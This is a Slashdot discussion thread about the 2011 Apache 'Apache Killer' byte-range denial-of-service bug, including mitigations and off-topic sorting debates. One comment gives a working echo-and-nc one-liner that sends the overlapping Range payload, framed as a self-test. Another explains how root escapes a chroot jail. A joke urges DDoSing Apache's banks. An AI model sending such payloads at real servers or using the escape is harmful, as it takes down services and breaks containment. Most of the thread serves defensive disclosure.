Apache Warns Web Server Admins of DoS Attack Tool 82
CWmike writes "Developers of the Apache open-source project warned users of the Web server software on Wednesday that a denial-of-service (DoS) tool is circulating that exploits a bug in the program. 'Apache Killer' showed up last Friday in a post to the 'Full Disclosure' security mailing list. The Apache project said it would release a fix for Apache 2.0 and 2.2 in the next 48 hours. All versions in the 1.3 and 2.0 lines are said to be vulnerable to attack. The group no longer supports the older Apache 1.3. 'The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server,' Apache said in an advisory. The bug is not new. Michal Zalewski, a security engineer who works for Google, pointed out that he had brought up the DoS exploitability of Apache more than four-and-a-half years ago. In lieu of a fix, Apache offered steps administrators can take to defend their Web servers until a patch is available."
Re: (Score:1)
Welcome to 2011, not running CGI scripts is a feature (and a good one at that).
Re: (Score:2)
using chroot/jails/containers/zones
Not being a Linux guru, I thought I had heard repeatedly "Chroots do NOT provide security"? Cant someone who pulls off a privelege escalation escape the chroot?
Re: (Score:1)
What about running CGI scripts on a separate virtual machine from the rest of the system? Basically set up a separate web server on that, and have all CGI scripts be executed from there. For access to shared resources, have a "gate keeper" process (or module in the web server) running on the original host which can give out one-time passwords which are then passed onto the script, and which the script can then use to access the resources through that gate keeper. The gate keeper can have a detailed knowledg
Re: (Score:2)
Re: (Score:1)
Web servers run without root privileges so that the server isn't capable of doing overtly harmful things but you can still modify things that the web server is supposed to modify. That is, it can still mess it up.
If you want to give scripts a separately isolated area, you can use this: http://httpd.apache.org/docs/2.0/suexec.html [apache.org] File system permissions takes over from here.
I don't know too much about SQL servers, but couldn't you probably use kerberos or something instead of directly using database passwor
Re: (Score:3)
Cant someone who pulls off a privelege escalation escape the chroot?
Yes, he can. Basically, the trick is to do another chroot to a subdirectory, but without doing the chdir. So now the attacker is in a situation where the current directory is above the root. Here he can keep doing chdir(".."); until he reaches the real root, and then all he needs to do is chroot(".");.
What's worse, this exploit is due to the way how chroot is spec'ed, thus it can't really be fixed by the kernel.
So yes, you can escape a chroot jail if you've got root. However, the point of the chroot jail
Re: (Score:2)
A proper SELinux (or AppArmor, I'd imagine) policy would also serve to confine them in their box.
Re: (Score:1)
Re: (Score:2)
Although, your comment was quite damn funny.
Re: (Score:3, Interesting)
Yes, that's why I use Hiawatha [wikimedia.org].
Re: (Score:2)
They're not even close to comparable. Apache has served me very well. My server is not even vulnerable to this as I don't have mod_deflate loaded or compiled. (I tested using the kill script.)
Re: (Score:1)
The link in the blurb claiming to point to the advisory from Apache isn't correct.
The actual advisory from Apache notes that mod_deflate's presence is orthogonal (irrelevant) to the exploitability of this issue.
The correct link:
http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3C20110824161640.122D387DD@minotaur.apache.org%3E [apache.org]
Re: (Score:2)
Re: (Score:2)
Lets not forget that being a proper admin and having Apache locked down by, for example, some SELinux policies... it's kind of a tough nut to break.
Someone should have attended Secure Codeing 101 (Score:2)
Algorithmic complexity attacks (of which this is an example) are nothing new. They have been done on really bad sorting algorithms (quick sort, which is still defended by quite a few people that simply do not get it or are not bright enough to implement the alternatives) and are today employed, e.g., against hash-tables. Libraries/languages by people with a clue (e.g. LUA), have protection against that. Others do not.
Writing secure code is a bit harder than writing merely working code. I guess people have t
Re: (Score:1)
This [lmgtfy.com] might be informative.
Re: (Score:1)
Alright, fair enough. Maybe you already know this but just for the benefit of the other readers: Quicksort is just fine if you can trust the data is generally randomized in order. The problem is primarily that it accomplishes this speedup by making the unsafe assumption that this is the case, meaning its really easy to dramatically increase the processing time required for a given sort by giving it data in certain specific patterns - such as reverse order or almost completely reverse order. It generally
Re: (Score:2)
considering the poor choice of a response, you should have checked your links. first one is "why quicksort sucks" that goes on to explain why a *modified* quicksort algorithm posted on wikipedia is not better than the original quicksort algorithm.
3rd link is "why java sucks", and down on the first page is "why .net sucks".
If you want to explain issues with an algorithm like that - say what it is, rather than posting a snide lmgtfy link that is wrong for the problem at hand.
So far it seems to me that the pro
Re: (Score:2)
Cant comment on quicksort since its been years since I was in a CS class, but none of those google results indicate that quicksort sucks.
Usually you want your LMGTFY to show clear examples that make your case, and none of those links do.
Re: (Score:2)
Who recommends quick sort for anything? It's got a bad, O(N^2) degenerate case that's been known about.. since the development of the algorithm.
It's my understanding that merge sort or merge/insertion hybrids are typically used generally, as merge has O(N*log N) for all inputs, and is stable, while insertion can be extremely fast for short lists (but is not appropriate for large lists, as it's also O(N^2)). Other sorts might be chosen if the data is known in advance to have favorable properties for them.
Q
Re: (Score:2)
I guess it depends on how many bits you have to implement your sort in.
If you are cramming the sort into less than 8bytes speed will take a back seat. If you can use gigabytes of memory you implement do a much faster more memory intensive sort.
Re: (Score:1)
Not only that, but quicksort is faster on average sized inputs, which is what you work with most times.
Low complexity doesn't equal speed.
Re: (Score:2)
Sadly, idiots (of which the the folks that codeed Apache are an example) nothing new. Their mediocrity has long suffocated us bright folk, many of whom are too timid to call these people what they are: pathetic failures. Others, like yourself, are not.
Achieving perfection is a bit harder than merely rewriting flawed code. I guess people have to experience humiliation over and over again...
Re: (Score:2)
This is a joke right?
Re: (Score:2)
Someone should have attended Spotting Sarcasm 101.
Re: (Score:2)
:) I had to ask. On /. it's not as easy as I would like to tell..
Re: (Score:1)
There are still people who didn't switch to introsort?
Quickfix (Score:4, Informative)
If this was IIS (Score:2)
Imagine the anti-Microsoft shitstorm around here if this was an IIS attack tool.
Re: (Score:1)
Re: (Score:2)
None of these justify the reaction that IIS would have gotten.
Slashdot is vulnerable... (Score:5, Interesting)
All versions in the 1.3 and 2.0 lines are said to be vulnerable to attack. The group no longer supports the older Apache 1.3.
Since Slashdot is still stuck in the late '90's with a thin veneer of bad javascript, over apache 1.3 it's vulnerable... and no patch either.
Re: (Score:2)
Oh and before you say that Malda & crew will do a deep code analysis of the 1.3 branch and fixit themselves:
1. They're STILL RUNNING 1.3!!
2. Slashcode... QED.
Re: (Score:2)
3. No more Malda [slashdot.org].
Re: (Score:2)
So someone could use this exploit and take /. down. :(
Re: (Score:2)
maybe they patched it. or maybe they filter the vuln. before it hits apache, it seems that it's just about asking for a large number of ranges in a head request.
A quick summary (Score:5, Informative)
A quick summary: A client can use byte range requests that are overlapping and/or duplicated to use a single small request to overload the server. eg: 0-,0-,0- would request the entire contents of the file three times. YMMV but this has to do with how Apache handles the multipart responses consuming memory and isn't an actual bandwidth DoS.
Unfortunately there are legit reasons for allowing out-of-order ranges and multiple ranges, such as a PDF reader requesting the header, then skipping to the end of the file for the index, then using ranges to request specific pages. Another example was a streaming movie skipping forward by grabbing byte ranges to look for i-frames without downloading the entire file.
So the fix discussion centers on when to ignore a range request, when can you merge ranges, can you re-order them, can you reject overlapping ranges and how much do they need to overlap, etc. The consensus seems to be that first you merge adjacent ranges, then if too many ranges are left OR too many duplicated bytes are requested then the request skips the multi-part handling and just does a straight up 200 OK stream of the whole file or throws back a 416 (can't satisfy multipart request).
Re: (Score:3)
Shouldn't the fix just be that Apache calculate the _total_ size requested by the client, and if that crosses some definable limit, knock back the request with a HTTP 4xx response ( "client demands too much" ) or a 5xx error ("we're not google") (if it wants to be polite)
Re: (Score:2)
Re: (Score:1)
Worse than that... even requesting a lot of small ranges can overload the server. The example code (iirc) requested the range 5-,5-0,5-1,5-2,5-3,5-4...5-1299 repeatedly. The real killer though is accept-encoding gzip, which causes Apache to try to zip all of those tiny ranges. That's really what kills the server.
Not that bad (Score:5, Interesting)
I read the advisory, chose a course of action, then it took about a minute to make my server not vulnerable. It's great that they made the disclosure.
Re: (Score:3)
In more detail...
Some of the suggestions from the Full Disclosure discussion and elsewhere:
Re: (Score:2)
Oh, and -- sorry -- Apache security advisory [apache.org].
test your vulnerability (Score:5, Informative)
You can do a quick test with something like this:
If you're vulnerable, you should see a really ridiculously long Content-Length header, like 900k or so.
Disabling mod_deflate or the equivalent prevents this behavior, but it's not clear that there isn't another exploit waiting to happen. A super quick fix is to kill the Range header entirely using mod_header, like so
RequestHeader unset Range
in your apache.conf or moral equivalent. For the most part, you can get away with not serving Range headers, and if you can't, you know it and don't need my advice on fixing this.
Re: (Score:1)
eg: echo -en "HEAD / HTTP/1.1\r\nHost:www.mydomainname.com\r\nRange:bytes=0-,$(perl -e 'for ($i=1;$i<1300;$i++) { print "5-$i,"; }')5-1300\r\nAccept-Encoding:gzip\r\nConnection:close\r\n\r\n" | nc localhost 80
A couple of my servers have Limit o
Re: (Score:2)
Just wanted to point out that this does *not* depend on mod_deflate or mod_gzip. That makes the problem worse, but it is the fact that Apache sets up a lot of internal data structures to handle the "metadata" of the multi-part request. Even with compression disabled, you can still easily overload the server with comparatively fewer requests because you're asking Apache to setup thousands and thousands of multi-part buckets for each single HTTP request. It doesn't take very many requests to bring everything
Thanks! (Score:1)
Touchpads? (Score:2)
mod_evasive ? (Score:1)
has anyone noticed if mod_evasive disarms/mitigates this attack vector?
How to test it against HTTPS? (Score:1)
Re: (Score:2)
Vulnerability first reported in 2007 (Score:2)
With the bug first reported over 4.5 years ago, this was entirely avoidable.
http://seclists.org/bugtraq/2007/Jan/83 [seclists.org]
Indexes (Score:1)
Re: (Score:2)
Recommended webserver for WSGI Python apps? (Score:2)
Since we're discussing Apache anyway... I've used Apache for over a decade now. Right now I'm working on a Pyramid [pylonsproject.org] app and publishing it with mod_wsgi [google.com] on Apache 2.2, for no other reason than that I'm already familiar with Apache. Since this is a brand new project and will be running on its own dedicated server - and therefore doesn't have play nicely with any pre-existing web apps - I wanted to re-evaluate my decision. If you needed to publish a WSGI app today, what server would you use and why?
Confisusion.. (Score:1)
"... and said it would release a fix for Apache 2.0 and 2.2 in the next 48 hours."
"... According to Apache, all versions in the 1.3 and 2.0 lines are vulnerable to attack."
So dropping support for 1.3 I understand (EOL etc), but fixing 2.2 event though it isn't reported as vulnerable? which is it?
Re: (Score:2)
I figured it was two different points. The first being that they'd release a fix for 2.x, and the other a less than subtle "Update your goddamn software!" reminder.
4 .5 years before they do something.... (Score:2)
I am glad they finally got to it, but if apache had told their bank that there was an issue with their account , I am sure they would have wanted their bank to do something right away about it, and not 4.5 years ago....you just have to hit them where it hurts...ddos their banks, not their servers.....